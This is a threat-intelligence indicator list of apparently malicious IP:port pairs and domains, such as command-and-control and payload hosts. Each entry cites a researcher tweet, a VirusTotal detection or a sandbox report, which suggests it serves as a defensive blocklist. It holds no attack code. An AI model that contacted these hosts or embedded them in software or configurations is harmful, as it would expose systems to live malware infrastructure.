41.141.56.139:4444

# Reference: https://twitter.com/ScumBots/status/1258790257610424321

93.26.183.236:4444

# Reference: https://twitter.com/ScumBots/status/1258817981817196544

45.132.73.167:8443
macloud.xyz

# Reference: https://twitter.com/ScumBots/status/1259090833191702529

3.17.202.129:11868

# Reference: https://twitter.com/ScumBots/status/1259699832136052741

3.137.63.131:19019

# Reference: https://twitter.com/ScumBots/status/1260003082605416448

46.21.147.111:443

# Reference: https://twitter.com/ScumBots/status/1260420191453941760

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/aa4c0c3573390beac0d610b51e665dddd3067593b9e3e642b84a84f08362591d/detection

microsoft-support.servehttp.com

# Reference: https://twitter.com/ScumBots/status/1260854950021812224

52.137.10.66:8080
frogoveryoureyes-2.workisboring.com

# Reference: https://twitter.com/ScumBots/status/1261694398456385536

58.186.22.82:3189

# Reference: https://www.virustotal.com/gui/file/5af0920fe7e468368563aed81c3f8bf00124a8480f2cd42cb9f3ab90229cd485/detection

utils.oss-cn-beijing.aliyuncs.com

# Reference: https://twitter.com/ScumBots/status/1263936676969275393

18.188.14.65:15252

# Reference: https://twitter.com/ScumBots/status/1263935061122039816

3.19.3.150:16128

# Reference: https://www.virustotal.com/gui/file/73f27d0736457997141cde9bbedfa5e7f5a3706282d1999e00f8b1629ee5797a/detection

starpingisd.net

# Reference: https://twitter.com/ScumBots/status/1264926396155154432

3.20.98.123:10343

# Reference: https://twitter.com/ScumBots/status/1265588641168003072

3.19.3.150:10038

# Reference: https://twitter.com/ScumBots/status/1267184160013275137

3.137.63.131:12405

# Reference: https://twitter.com/ScumBots/status/1267184230142029827

3.137.63.131:16051

# Reference: https://twitter.com/ScumBots/status/1270078224119345157

netconnect.online

# Reference: https://twitter.com/ScumBots/status/1270465776164757504

52.47.122.36:443

# Reference: https://twitter.com/ScumBots/status/1270882271625711616

91.241.19.50:441

# Reference: https://www.virustotal.com/gui/file/53f796dbbffb542e42082913b54de4550fafe2e2b0c14194a4ef3ac6ad297089/detection
# Reference: https://app.any.run/tasks/0226a288-c2c5-4ff6-b6fb-cffbd18450f7/

ostrykebs.pl

# Reference: https://twitter.com/malwrhunterteam/status/1271160638342127618

/powersploit-payload

# Reference: https://www.virustotal.com/gui/file/e008999f37b5eacb30d9f8df95a774a92caca1de9d4eb0444f63fe28b85ea9a3/detection

122.178.241.198:4444
topsideduck.ddns.net

# Reference: https://www.virustotal.com/gui/file/6a60f839ad4e0feb6528840ead34f680cb975c13c1e6e4e9a5d132eb24992928/detection

82.137.218.185:4000

# Reference: https://twitter.com/ScumBots/status/1272933338345586690

217.129.59.131:443

# Reference: https://twitter.com/ScumBots/status/1272967268713082881

http://18.231.21.238

# Reference: https://twitter.com/iamwinstonm/status/1273195438619967489

http://185.244.149.202

# Reference: https://twitter.com/ScumBots/status/1273509581734502401

3.13.191.225:10360

# Reference: https://twitter.com/ScumBots/status/1273793952114753537

3.20.98.123:16853

# Reference: https://twitter.com/ScumBots/status/1274873568388620288

3.20.98.123:19779

# Reference: https://twitter.com/ScumBots/status/1274876086254473225

3.21.60.148:17272

# Reference: https://twitter.com/ScumBots/status/1274879860339544064

51.79.158.48:4141

# Reference: https://twitter.com/ScumBots/status/1274951580119371776

3.19.6.32:16555

# Reference: https://twitter.com/ScumBots/status/1274954097775579142

3.21.60.148:19960

# Reference: https://twitter.com/ScumBots/status/1274954166981582850

3.21.60.148:19760

# Reference: https://twitter.com/ScumBots/status/1274959133687656448

3.137.63.131:16057

# Reference: https://twitter.com/ScumBots/status/1275165640148557825

3.13.191.225:28288

# Reference: https://twitter.com/ScumBots/status/1275238473767755776

3.135.90.78:16604

# Reference: https://twitter.com/ScumBots/status/1275515779828584449

3.13.191.225:1337

# Reference: https://twitter.com/ScumBots/status/1275637659482959873

3.17.117.250:1337

# Reference: https://www.virustotal.com/gui/file/2ff79bdaf50e36f7f2f37506ce0ad1e9fafc4d8d40073cedcf050ddb7ce87539/detection

91.241.19.50:27119

# Reference: https://www.virustotal.com/gui/file/7f9390b993605ce2f1097533422e8d6bc43ca2e5d878dd44fdcd6e456f027d71/detection

91.241.19.50:443

# Reference: https://twitter.com/ScumBots/status/1276310538809675777

bot.ruptur88.cf

# Reference: https://twitter.com/ScumBots/status/1276277332752437248

148.101.44.115:3306

# Reference: https://twitter.com/ScumBots/status/1276265872366149633

3.18.75.105:15008

# Reference: https://twitter.com/pmelson/status/1276531571231789058

5.199.174.204:9443

# Reference: https://twitter.com/ScumBots/status/1276773591649042433

195.206.105.52:5389

# Reference: https://app.any.run/tasks/1337bdde-7564-493f-b5a1-57fdbec6cc5c/

http://45.129.96.110

# Reference: https://twitter.com/ScumBots/status/1278940366658568192

3.17.117.250:16240

# Reference: https://twitter.com/ScumBots/status/1278963016621580288

139.155.2.101:8081

# Reference: https://twitter.com/ScumBots/status/1278767101864542208

52.151.2.106:8888

# Reference: https://twitter.com/ScumBots/status/1278600633394880512

23.105.221.34:4443

# Reference: https://twitter.com/ScumBots/status/1280229759843172353

loljumbo.serveousercontent.com

# Reference: https://twitter.com/ScumBots/status/1281078730627198976

94.156.189.220:6522

# Reference: https://www.virustotal.com/gui/file/0503b17fb6673ab7adf3c53405f8d9bca2a1666f890f01e7fc170eec64264e94/detection

3.19.6.32:11642

# Reference: https://twitter.com/ScumBots/status/1281279531559649287
# Reference: https://www.virustotal.com/gui/ip-address/206.189.151.95/detection
# Reference: https://www.virustotal.com/gui/domain/webupdate.live/relations

netconnect.online
upserver.ml
webupdate.live

# Reference: https://twitter.com/ScumBots/status/1281678408863420417

94.156.189.220:6530

# Reference: https://twitter.com/ScumBots/status/1282010599027814400

185.244.213.8:443

# Reference: https://twitter.com/ScumBots/status/1282614578258550784

3.18.75.105:16334

# Reference: https://twitter.com/ScumBots/status/1282783188620845057

94.156.189.220:1959

# Reference: https://twitter.com/ScumBots/status/1283213525645754369

3.20.98.123:10593

# Reference: https://twitter.com/ScumBots/status/1283548228315750401

193.161.193.99:52614

# Reference: https://twitter.com/ScumBots/status/1284099360813391872

77.255.61.191:4444

# Reference: https://www.virustotal.com/gui/file/c67706504a82f8ffb08ad9a011b987c56748a2edeeeaf7b350e152a7c412352a/detection

172.94.59.115:4444

# Reference: https://www.virustotal.com/gui/file/25801b86c6d2f41ea26db2b6508568ac95e0c568cd7f54af74676181e2564a30/detection

104.244.78.10:443

# Reference: https://www.virustotal.com/gui/file/cb0a57a9de876adec68084482dd819110c38e3a7ea30c2ff9bffa7eb2275280b/detection

versageshops.best

# Reference: https://www.virustotal.com/gui/file/45116c476093055ac6bb414c6270b76f2988e0af05ee3eb3943a5eb36271a0d7/detection

122.171.58.94:8885

# Reference: https://twitter.com/JAMESWT_MHT/status/1287660192579162112
# Reference: https://app.any.run/tasks/1cb4244e-4887-429c-a1a3-447ff6464994/

64.188.22.106:443
office-update.net

# Reference: https://twitter.com/ScumBots/status/1287763508952739844

34.90.230.177:443

# Reference: https://www.virustotal.com/gui/file/225f7d3a59452bab7b07882f4b09643d6f0c32d8efdb89a7602f5dc0070c0c32/detection

94.140.114.160:61262

# Reference: https://www.virustotal.com/gui/file/b4d465a5d1f9a9b57ac91eff7b2e622f6d596617b62797d14efbd721d3b5dc74/detection

195.54.160.115:8018

# Reference: https://twitter.com/InQuest/status/1289636542621908992
# Reference: https://www.virustotal.com/gui/domain/divineleverage.org/relations

divineleverage.org/12.msi
divineleverage.org/4.php
divineleverage.org/6.msi
divineleverage.org/de.php

# Reference: https://www.virustotal.com/gui/file/cbc445b76e9b4364088442abb6f4af3ca70b242e462f66a974dbfebce94b6a81/detection

3.17.117.250:443

# Reference: https://www.virustotal.com/gui/file/a3585d049877144fec5ba1fcaba028ecedb05ab46a174d6ef5105351e5a66579/detection

supercombinating.com

# Reference: https://www.virustotal.com/gui/file/f8276187bbb6dc1523b2f7619b3905466cacb6a58e5d335257fd29e9b0dd8253/detection

213.87.133.142:443

# Reference: https://www.virustotal.com/gui/file/21c5b859c59ef1997f0135552d068d41646fa478bbde43302ccbcf9d8e432aeb/detection

193.34.166.103:443

# Reference: https://www.virustotal.com/gui/file/9c676f263a4eaf2057f657cbd63af106b3d22dda5ed37c55152e4dc9f6ea6769/detection

142.93.56.217:2905

# Reference: https://www.virustotal.com/gui/file/6db020f21e1544eca23093995b6eae7e8b031b65bfe2eca9f4d8dc73b30c7b79/detection

142.93.56.217:4443

# Reference: https://twitter.com/sysopfb/status/1288160992124444672
# Reference: https://www.virustotal.com/gui/ip-address/106.53.232.176/relations
# Reference: https://www.virustotal.com/gui/file/c5eee3c38b0ce6c869cd46ade783ab5ef09a30f08d7f8ddf8870de2d04068e74/detection

106.53.232.176:443
bobohacker.oss-cn-shenzhen.aliyuncs.com

# Reference: https://www.virustotal.com/gui/file/9e7885743e15912ab7284edfe9ef1113d7fc65568a12e1b96ac010598afa9fde/detection

49.235.144.34:4433

# Reference: https://www.virustotal.com/gui/file/d09e55ea3fbae604c29e6ef25247a3273c66044218a6a28fa79abcaa84f10be0/detection

49.235.144.34:8899

# Reference: https://www.virustotal.com/gui/file/e4ea5efc8a9511bb51d35f25a76e35ff941877252a4d3f043f3547c63d176ddf/detection

91.232.105.248:1337

# Reference: https://www.virustotal.com/gui/file/7150ef5a8c8381c68e7e305fb5b370a34bfcfa144aa8c138f04cc9e39080daf9/detection

18.222.239.205:7000

# Reference: https://www.virustotal.com/gui/file/c6ed0ba7acc1ba9ebc7de487f92d8232528be6b0dd7765bf35e0c4161a386d97/detection

206.189.70.79:9876

# Reference: https://www.virustotal.com/gui/file/bd914aba1523c1bec3c5bc7d4918f7163ac6e4f7b7778b383ac934a0644061e6/detection

81.184.61.235:2121

# Reference: https://www.virustotal.com/gui/file/ef70ffeb0ca757c688f8d3f0d5cb2a712b29778ec2c04e1b78f6fd4d31a84bb3/detection

67.43.224.135:443

# Reference: https://www.virustotal.com/gui/file/c6ed0ba7acc1ba9ebc7de487f92d8232528be6b0dd7765bf35e0c4161a386d97/detection

206.189.70.79:9876

# Reference: https://www.virustotal.com/gui/file/71fcfac0eb853bfd9be99ff5ecc2c127bfc78c4248097fd705f8f5a5ade426fb/detection

52.14.61.47:17239

# Reference: https://www.virustotal.com/gui/file/fbfbf239d27dc218c156510a471fd72b83f04aef36deea1c05ff7f7646953f20/detection

185.212.227.247:1333

# Reference: https://www.virustotal.com/gui/file/108b68986924bf60cc39da01a2f140aa6ddeec056df099cf4a73abfbcdc08930/detection

137.224.106.4:73

# Reference: https://www.virustotal.com/gui/file/90e0ce066f5ad7b902a24872aaaf4769996753ce5ee1b407e5db432fd4c471a2/detection

191.242.111.2:1515

# Reference: https://www.virustotal.com/gui/file/bdf90a891969cd8ed146efd7ac19a9b9cd976eb4dbbaf90c6c08a387acfb5e0b/detection

172.105.28.98:1443

# Reference: https://www.virustotal.com/gui/file/d1fe07320067c3ab75a7ca30741116974880c885437760eecaff8623a21baa56/detection

360lab.ddns.net

# Reference: https://www.virustotal.com/gui/file/4bcab93f768c19811b4fd1069f791c10b16b4a9e126faccfe2f3f2b3256d12e5/detection

49.235.23.236:9999

# Reference: https://www.virustotal.com/gui/file/d7542afc77f35b98bba90a89c38fab550ec536a3fb57fe24d362fa301ebc3ac2/detection

62.171.159.243:3333

# Reference: https://www.virustotal.com/gui/file/44e50b2c62d637e3247c79e88f7af40c4f0bb77eb91c91a83dfa80e95720548f/detection

45.76.209.19:443

# Reference: https://www.virustotal.com/gui/file/ec59dc742452c5fe33489183f03bdd40ecc179642f0c393d16e327d61cae94ba/detection

45.76.209.19:4444

# Reference: https://www.virustotal.com/gui/file/14ffe076ac8cdb3d6f780adf09d743299e9ebec5699b533f64920ef5b7596184/detection

google34.theworkpc.com

# Reference: https://www.virustotal.com/gui/file/f5e69036674045c33682c568993d0c1f287640c85d85deaed7d607fdf72f5666/detection

5.34.180.171:456
rostelekom.pw

# Reference: https://www.virustotal.com/gui/file/3f3a5568991c970cbf9378bd29f86413c39202091aa9d58fa5b67213576c5774/detection

79.134.225.46:2309

# Reference: https://www.virustotal.com/gui/file/be63a303af673f5c03b02107af3a7ac1bac102c3b75f8a11b8e04256a58ab327/detection

52.15.194.28:19286

# Reference: https://www.virustotal.com/gui/file/ead07ee3695925a1b79eafe57bfb023a54254848e68031afa7459f87d14361ec/detection

185.82.217.66:8787

# Reference: https://twitter.com/ScumBots/status/1299191823106215937
# Reference: https://www.virustotal.com/gui/file/189a21b97949a56e32797c3ce37db2624551190073e61194d98736e843e6977f/detection

aigoodojoqu5oopae3ee.sitestill.space
goosh5wie8oa1oov2viw.sitestill.fun

# Reference: https://www.virustotal.com/gui/file/a768b19d3fd1c0f043cc24119c366efdd0e4a0a8483dd9759d2a6a568de6d2ae/detection

185.205.210.179:4321

# Reference: https://www.virustotal.com/gui/file/9f749f0c696c948a80ff3cbea061f0326990925ae32aecc905fe95533518d604/detection

185.205.210.179:6341

# Reference: https://www.virustotal.com/gui/file/22bb3e8141a415f83bca4e2dd8b4bf6413a47e4ee5e38131c4c5b8349f21ee0b/detection

92.42.14.133:443

# Reference: https://www.virustotal.com/gui/file/b301db6b72a2196f99e3da577bd47b724af5d219c192ac2ed921179c0b015592/detection

3.19.6.32:443

# Reference: https://www.virustotal.com/gui/file/4ea106c4e2f1b9a56c00ce01b9a1c941e2f9fdb8df9ff6e91fad93ea81eddcc2/detection

3.21.60.148:14067

# Reference: https://www.virustotal.com/gui/file/c380f48e3d649b6a44b05134108a8c79536f289240e9ed9135e35dadffb6c350/detection

47.99.211.221:8011

# Reference: https://twitter.com/ScumBots/status/1302012841059287043
# Reference: https://www.virustotal.com/gui/file/ba00ffb4b8242f1ad034374a374cf2a9c693cf26b2ba0aa14d1c499e94f4a698/detection

76.21.118.155:4444

# Reference: https://www.virustotal.com/gui/file/f69b1d7998fb00503dea99fa02e19fd61fd1cac2dc84226b86e9d321a51563da/detection

193.109.85.11:8080

# Reference: https://www.virustotal.com/gui/file/6fdc5cc3cbc299f8473d365c87a2fc74813835e7cd4a56ea8b463a9b897936d3/detection

3.239.85.50:8

# Reference: https://www.virustotal.com/gui/file/9f3014f373a5ef6939b7553b770932e57d3dd56225162e4a7134824dd290a37f/detection

3.131.123.134:17759

# Reference: https://www.virustotal.com/gui/file/bb2beae5059a34febd4e88b9cec4167c90d75809debe57848638f26847d7c07f/detection

192.243.108.143:8080

# Reference: https://www.virustotal.com/gui/file/77c48346e04d756712f68db858f7a4e9fcc54bb7681560e9769f741fa55795d8/detection

Rezureax123333-50626.portmap.io

# Reference: https://www.virustotal.com/gui/file/05d75b372218a5c28b3c47f591f969a59714a5fadbc4b9bd4d18611c76920c66/detection

185.150.117.78:443

# Reference: https://www.virustotal.com/gui/file/fb49d3c2488b86be9ea13014a95b87b4e08582511bea1432e100c1d31e39175c/detection

35.182.213.89:443

# Reference: https://www.virustotal.com/gui/file/674be83562be595dbdf31801b9b0f141cef5ef52e23a982a011c175607ae5342/detection

3.134.125.175:17186

# Reference: https://www.virustotal.com/gui/file/79e27ceee57607cbc60ffbc772f01a654b40cd5491553c3cb544d06c3f0f7941/detection

3.130.209.29:13544

# Reference: https://www.virustotal.com/gui/file/102e9f1bffbed86cbbdd383c24c0f4339ab33fc2da0d3cc935237ce127a5e123/detection

38.132.99.165:443

# Reference: https://www.virustotal.com/gui/file/f83e23d630554a3b6db9378964a0a7161ef354cd41d39566b595c86b83a79dcb/detection

45.227.255.171:443

# Reference: https://www.virustotal.com/gui/file/b87336d536c68362ac710bc6ab411965747ec2cd60036292d8ab5f469183acb7/detection

172.241.29.12:443

# Reference: https://www.virustotal.com/gui/file/8db15f541e5b5de82eb55c2fb1720c399d2660a6739255bf1a03763a24fb7586/detection

148.72.176.8:1312
windown-network.myq-see.com

# Reference: https://www.virustotal.com/gui/file/2d631a0a33e915ac3e401d563928a4a7e6d521a8a6be201842b136a86651c846/detection

15.188.8.184:4444

# Reference: https://www.virustotal.com/gui/file/996193e0dcfb60760d7c92527ddec506a8935ad4b42e7fa5ae43bf9e92fe6c4a/detection

71.142.245.190:4444

# Reference: https://www.virustotal.com/gui/file/353f5ffbc3a9c6da2b6d12e3cd1ae99f87e49437375ed2774bcecf9c1515746d/detection

84.238.38.219:1024

# Reference: https://www.virustotal.com/gui/file/f35286de33f3de43806610d65219afb60338e8efb7fa1cb8de5620ddc71bf478/detection

45.227.255.189:443

# Reference: https://www.virustotal.com/gui/file/dae5abc6158c84e826975c7cad786bef9ed4e8c21920ede7d4a71ff6d7d84ab2/detection

104.225.157.144:9000

# Reference: https://www.virustotal.com/gui/file/7459887fba5dea90da46008690a5fee008597a901d7d32754139a2045dced180/detection

92.38.152.45:80

# Reference: https://www.virustotal.com/gui/file/81c87fa0c8cb5d844791509523cd00e98fee1657293c2c62e2e0f73efafe8937/detection

193.161.193.99:59494

# Reference: https://www.virustotal.com/gui/file/817dc0cc93600e2dd0fd49a78f1ddfad61da80a590774841dc15236d82f223fa/detection

160.119.79.88:443

# Reference: https://www.virustotal.com/gui/file/467bfaa6e5d3d29684c964dad40fca99e85dcdeef7ebb2580010d9e61e5b4e7d/detection

39.105.179.187:4400

# Reference: https://www.virustotal.com/gui/file/f55c4c8016756c63c772524c51961821157a07b4febc196cf7a635e36f74b7da/detection

141.105.66.240:8441
h0pe1759.ddns.net

# Reference: https://www.virustotal.com/gui/file/e19485415d49798547753a9fab67bd6a7c0ab0a234b4366f65dd85621838c4c8/detection

1.202.156.1:39999

# Reference: https://www.virustotal.com/gui/file/4067b40f3381b90f611399555f2cac36cd571dcb42fcca91be906489f0c29bf1/detection

http://45.146.165.219

# Reference: https://www.virustotal.com/gui/file/8f0215a8677cc41794519ca18fcc4ea00b9f9080962508d3d7a8f6a7f3d7992f/detection

http://91.241.19.21

# Reference: https://www.virustotal.com/gui/file/3c68ccfd70614ba27c88a1300d3a3401719e2282ead93c1f2f9a02a296e6654a/detection

52.14.18.129:11429

# Reference: https://www.virustotal.com/gui/file/8915f63fdecfcc72e43af78bf188f390ca485ed8f05e34481eee7334c48682b9/detection

199.195.253.79:4242

# Reference: https://www.virustotal.com/gui/file/d8b8be152f7587e115e3e083814837031cb97af56b576e479e1e4fb0ad46323a/detection

193.161.193.99:22898

# Reference: https://www.virustotal.com/gui/file/0b8c09c5a62155c82d499601b3725574fec04b077ee0d9972de330f53e007c64/detection

ns.vvwvv.tk

# Reference: https://www.virustotal.com/gui/file/967a6a41410fd7c6a9aefb86dbe31a184a2b27357e8d19e4a807e227ba9029eb/detection

156.209.144.96:4455

# Reference: https://www.virustotal.com/gui/file/6772f63826584c7cccf747b80735bdc8d76bf4fd76369a5af3d9d67443befbb8/detection

156.209.206.200:4455

# Reference: https://www.virustotal.com/gui/file/94838b74b218eef0bab19cb5cd58cda81ced3006382be914ceeb4b52c861e96b/detection

115.159.119.89:80

# Reference: https://www.virustotal.com/gui/file/ffa2e985e7598a092b2d61a66269965c162d5286c7f4b630ffbe7ac640a2f598/detection

109.59.118.171:4444

# Reference: https://www.virustotal.com/gui/file/6e79a451bfdc2c16b72e44c537de4efcb54d355f53d0054a11652e5c800fd2fa/detection

106.10.106.0:443

# Reference: https://twitter.com/pmelson/status/1336835181387374599
# Reference: https://www.virustotal.com/gui/file/411a3098347a34cc46f681cd855b152386da064d625e0f418de92a7cdcf7b94c/detection

47.111.13.98:80

# Reference: https://www.virustotal.com/gui/file/971adad65b31ac9ca6ea3c3a5085ce2bc1f27004250bf18e87da2bd6dfea090b/detection

193.161.193.99:4884

# Reference: https://www.virustotal.com/gui/file/5684fa5e0b0aad1e253dca7cc71b6d5092731d29887a22d65546d84d170dc5e7/detection

193.161.193.99:36555

# Reference: https://www.virustotal.com/gui/file/f5b943d0135ca0030092231df4a90c4011a878467c16b6f08e21892af1195475/detection

104.28.10.8:2052

# Reference: https://www.virustotal.com/gui/file/369c7f4ef0ca549b6d3ed4b11c9d069836414300f5903c19091072ceba8a3062/detection

3.89.39.190:4141

# Reference: https://www.virustotal.com/gui/file/7c35885540eacc15930b1f9cdd2541d69a299d0dc89bd7e5764213986916a908/detection

3.131.147.49:19910

# Reference: https://twitter.com/James_inthe_box/status/1338971736016969728

3.133.107.218:3131

# Reference: https://www.virustotal.com/gui/file/d64454bde412b0a7f7f1b9fa413a39ae0e6cf1f8a42ee120d757eaabf8c22033/detection

192.16.0.12:4444

# Reference: https://www.virustotal.com/gui/file/6ef17302c43f67aa1b2c30d86d5b13e592a1abd5b5aa2cef9f21e5ed0f35cec1/detection

124.187.65.208:6606

# Reference: https://www.virustotal.com/gui/file/c2e6f2496ab549c258a1d004fb0c5548413c81f5a556611c369d93a75e3835be/detection

185.205.209.3:443

# Reference: https://www.virustotal.com/gui/file/2b18ab922508b1702b7e6735d16cd3df3260da225ed7436507b329f6f23b43c8/detection

106.75.81.232:12345

# Reference: https://www.virustotal.com/gui/file/aeabd843be9c686bb4db7d720329862c1a6b3c428424f6aec3f6d119c6a70675/detection

5.167.22.68:8080

# Reference: https://www.virustotal.com/gui/file/c24f81c9d092c6c54f2909d6510cab0c0ea0cb6da78f90118bc3f623d5b09e93/detection

47.115.171.255:443

# Reference: https://www.virustotal.com/gui/file/83165474a39af396fbf927271d4f98c9d9567d696723c84ca4ceefbdedc51a72/detection

3.138.45.170:10730

# Reference: https://www.virustotal.com/gui/file/c06ceb893ead5ecb10aaed10c1f7ad8663981130f0fde5a8cbb86cc94200afe4/detection

151.0.0.54:4444

# Reference: https://twitter.com/ScumBots/status/1362431659728060421
# Reference: https://twitter.com/pmelson/status/1362432245152190465
# Reference: https://www.virustotal.com/gui/file/be6d55780cf2ec71310936d3ea31e8efb3d2ff0c21e1ce7d934a673b2d235655/detection

pterobot.net
scret1.ga

# Reference: https://www.virustotal.com/gui/file/d6a9d915eabf42f467fc6639717876cde95897ff42ffb20006ba9feb2f473c3a/detection

3.138.180.119:14119

# Reference: https://twitter.com/jhencinski/status/1367141043695742977
# Reference: https://www.virustotal.com/gui/file/ca9a59ec3f8f6c68b2faad832a163477f2a54870895ce81754ae9496739cb0a5/detection

http://86.105.18.116
86.105.18.116:8080

# Reference: https://www.virustotal.com/gui/file/70b8acf083e052ead5bfc43510d8b0c8f3d0a2d7111050cae5527e89e979e138/detection

18.207.38.244:9002

# Reference: https://www.virustotal.com/gui/file/38e4d4e5436fc2dc31cf37d13670b72a5a8f4319e36cc70436064eaa8a3aa219/detection

18.207.38.244:4444

# Reference: https://www.virustotal.com/gui/file/fb80cc96d1da0bb7f840dde51a602868d6c7b094560f034a204a417250e29cbb/detection

18.207.38.244:7878

# Reference: https://www.virustotal.com/gui/file/19ecc6e0e711913c85d0a0642972ca3a384084681b6cb9894a892669efce54e5/detection

45.33.100.49:4444

# Reference: https://www.virustotal.com/gui/file/45404167e89a4e85efb1b916509bc33e1d28347597051926fd18bbc33a1e350a/detection

185.153.199.102:19999

# Reference: https://www.virustotal.com/gui/file/26b52f93f1e317e82c10b4080a1b1ea257f73f34806722b8fa28d7ace6801eff/detection

45.33.100.49:443

# Reference: https://twitter.com/r3dbU7z/status/1371989287034585089

frostycitadel.xyz

# Reference: https://www.virustotal.com/gui/file/d06b6e85af0ab7ec12f7d5fba3a5ed87093a054a8c355fe4b908f51259e3f89a/detection

3.128.107.74:15257

# Reference: https://www.virustotal.com/gui/file/c1f6e9066d6253223b7a6b1f88992a05a79e54455125d1def4f9dc9e1f4e3c64/detection

3.138.180.119:15001

# Reference: https://www.virustotal.com/gui/file/b698123b562ed9646fe16d2d353191d8c79473b68c9d92de58a181f37b3c305e/detection

3.142.167.54:10274

# Reference: https://www.virustotal.com/gui/file/9ac9f3790d575e1afe3203ab45681b3e4e2d024dad4cba74825f05b3a8efabc6/detection

3.141.210.37:14956

# Reference: https://www.virustotal.com/gui/file/44a1ebcf5f3b564d8ba1b94b7f7bdd7dc731e098f98df602706848bfebe1a589/detection

8.9.6.228:4444

# Reference: https://www.virustotal.com/gui/file/08b08f269beab5f6bfcc046fbc3b2ba1d9df85b7d162ca0d4227390eac70aef8/detection

100.15.133.91:6002

# Reference: https://twitter.com/TheDFIRReport/status/1382313940533796865
# Reference: https://beta.shodan.io/host/136.244.100.210

136.244.100.210:22
136.244.100.210:443

# Reference: https://www.virustotal.com/gui/file/bf256c96ad1bebc4bd595ce59168c27beac3806a674243c4c90f9e08c1a11fec/detection

104.46.95.54:443

# Reference: https://www.virustotal.com/gui/file/98917a9aad6dc80c2ddd23f69ec8064c7e9940a6d9d095cad87a9257ea17925b/detection

75.141.150.74:1337

# Reference: https://www.virustotal.com/gui/file/289f2a019cad83a3014c7d25385f46b80a2bac195744c13129ef0aec3db7fe66/detection

103.146.74.4:2811

# Reference: https://www.virustotal.com/gui/file/972d78154aa35a9ac3c6d5f0cfbf70d3f2123239cb15ef04bd17c390b9d7186e/detection

141.255.152.226:2811

# Reference: https://www.virustotal.com/gui/file/ea01c860df4cb1f77eec64988ed6c24b076e86248c29443d5f2aed65974fe9f1/detection

141.255.157.246:1447

# Reference: https://www.virustotal.com/gui/file/63cc5e3a7fb07e88666fb8c2628971292e92801554ebad66b5e496aebca5124e/detection

182.2.164.147:1337

# Reference: https://www.virustotal.com/gui/file/eb8e24fb8118faf4b657686cae0f3dc367999e8632eef16104f69d84d6f241e2/detection

18.188.14.65:15739
18.216.53.253:15739
18.223.41.243:15739
18.224.144.66:15739
198.58.98.92:15739
3.13.191.225:15739
3.134.125.175:15739
3.134.196.116:15739
3.134.39.220:15739
3.135.90.78:15739
3.137.63.131:15739
3.14.182.203:15739
3.14.212.173:15739
3.17.117.250:15739
3.17.202.129:15739
3.17.7.232:15739
3.19.114.185:15739
3.19.3.150:15739
3.20.98.123:15739
3.22.30.40:15739
45.79.7.70:15739
45.79.9.205:15739
52.14.61.47:15739
52.15.183.149:15739
52.15.194.28:15739
52.15.62.13:15739
52.15.72.79:15739

# Reference: https://www.virustotal.com/gui/file/e2be06a6a516709ef11b6d2a3bab1cabb97cc38304b5bbd9450c140bb4db644a/detection

95.211.239.205:555
windows-srv.16-b.it

# Reference: https://twitter.com/TheDFIRReport/status/1387455318569988105
# Reference: https://beta.shodan.io/host/47.111.239.107

http://47.111.239.107
47.111.239.107:9443

# Reference: https://www.virustotal.com/gui/file/c08b712cae78d20d2f0f143a320098e722ffe6070b56b010f09c49edfb7c05ac/detection

159.203.228.45:443

# Reference: https://www.virustotal.com/gui/file/1cd6c84e68002428d5f593e38a37a8b96b73918633287b7d1c4c71b2eb9338f2/detection

13.58.157.220:17109
3.142.129.56:17109
3.142.167.4:17109
3.142.167.54:17109
3.142.81.166:17109
3.19.130.43:17109

# Reference: https://www.inde.nz/blog/different-kind-of-zoombomb
# Reference: https://tria.ge/210325-j85q1nwljj
# Reference: https://www.virustotal.com/gui/file/f547410bd2f0b667b640e350d7c8c55cd4c2f7249e534c02c63d824c87ee2454/detection

http://139.60.161.60
http://45.146.164.111

# Reference: https://www.virustotal.com/gui/file/47e22ff3a144d35cf9839c719009c65618dc3bdf027d151170a5c9882830fbc4/detection

151.80.70.31:4444

# Reference: https://twitter.com/TheDFIRReport/status/1392089649984774146
# Reference: https://beta.shodan.io/host/20.47.114.17

http://20.47.114.17
20.47.114.17:443

# Reference: https://www.virustotal.com/gui/file/16cdf36f2594d6980ef823f1f0405ffb6efaecf143ce790ea16cdf832858816e/detection

195.154.170.195:5555

# Reference: https://www.virustotal.com/gui/file/18539194e29621d4d23a1071b5ada043a71f59085d22c99193d1434e782810ab/detection

146.0.128.54:59498

# Reference: https://twitter.com/TheDFIRReport/status/1394257640851640323
# Reference: https://beta.shodan.io/host/46.101.235.245

46.101.235.245:443

# Reference: https://www.virustotal.com/gui/file/50e825a3a61e6f5fab0740c7ced94ac994d954b95df998fb06f6c11833863006/detection

3.136.65.236:10456

# Reference: https://www.virustotal.com/gui/file/6ce2400e5b6b0ee6feb5d868d89ced79c828b6bba5d837306e44a42f9bb2b952/detection

173.230.145.224:4444

# Reference: https://twitter.com/TheDFIRReport/status/1407322479664762890

207.154.205.192:443

# Reference: https://twitter.com/ScumBots/status/1413488183971663873
# Reference: https://www.virustotal.com/gui/file/bd292dd957afeb361a60e90239d84e03664a3d972934635ca7f5bd73a330cc01/detection

3.13.191.225:15328

# Reference: https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

103.238.227.201:7788
104.131.154.119:8080
104.131.182.177:443
104.145.225.3:8081
104.233.102.23:8080
107.170.132.24:443
108.61.211.36:443
108.61.217.22:443
137.117.188.120:443
138.121.170.12:3031
138.121.170.12:3133
138.121.170.12:3135
138.121.170.12:3136
138.121.170.12:3137
138.121.170.12:3138
138.121.170.12:500
14.144.144.66:8081
145.131.7.190:8080
146.148.58.157:8088
149.56.178.124:8080
159.203.18.172:8080
163.172.175.132:8089
185.117.72.45:8080
187.177.151.80:12345
187.228.46.144:8888
188.68.59.11:8081
191.101.31.118:8081
192.241.129.69:443
197.85.191.186:443
205.232.71.92:443
212.99.114.202:443
23.239.12.15:8080
24.111.1.135:22
41.230.232.65:5552
45.63.109.205:8443
46.101.185.146:8080
46.101.203.156:443
46.101.90.248:443
46.246.87.205:443
50.251.57.67:8080
50.3.74.72:8080
52.28.242.165:8080
52.28.250.99:8080
52.36.245.145:8080
52.39.227.108:443
52.86.125.177:443
64.137.176.174:12345
66.11.115.25:8080
66.192.70.39:443
66.60.224.82:443
68.66.9.76:443
69.20.66.229:9443
84.14.146.74:443
84.200.2.13:8080
84.200.84.185:443
93.176.84.34:443
93.176.84.45:443
http://104.130.51.215
http://11.79.40.53
http://139.59.12.202
http://159.203.89.248
http://163.172.151.90
http://166.78.124.106
http://197.85.191.186
http://222.230.139.166
http://23.116.90.9
http://47.88.17.109
http://52.19.131.17
